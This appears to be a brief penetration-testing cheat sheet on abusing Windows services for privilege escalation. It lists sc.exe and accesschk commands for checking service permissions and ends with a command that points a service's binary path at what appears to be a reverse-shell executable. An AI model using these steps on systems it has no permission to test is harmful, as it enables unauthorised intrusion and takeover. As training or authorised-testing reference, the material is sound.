Service Exploitation

Basic commands when abusing services to elevate privileges after being identified with a tool such as WinPEAS.

Basic Commands

# Query the configuration of a service
sc.exe qc $service_name

# Query the current status of a service
sc.exe query $service_name

# Modify an option on a service
sc.exe config $service_name $option= $value

# Start and stop a service
net start/stop $service_name


Use Accesschk.exe to validate service permissions:

.\accesschk.exe /accepteula -uwcqv user $service_name
  • What we are looking for in the output is the SERVICE_START and SERVICE_STOP permissions.

  • We also want to confirm that it is running under a user with higher privileges (e.g., LocalSystem)


  • Validate if you can start/stop the service or the machine. If you cannot then you may not be able to use it to escalate your privileges.

  • Check if we can reboot the system with whoami /priv

  • An easy way to escalate privileges utilizing a service is to modify the binaries path. The following demonstrates an example of this:

sc config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""

Last updated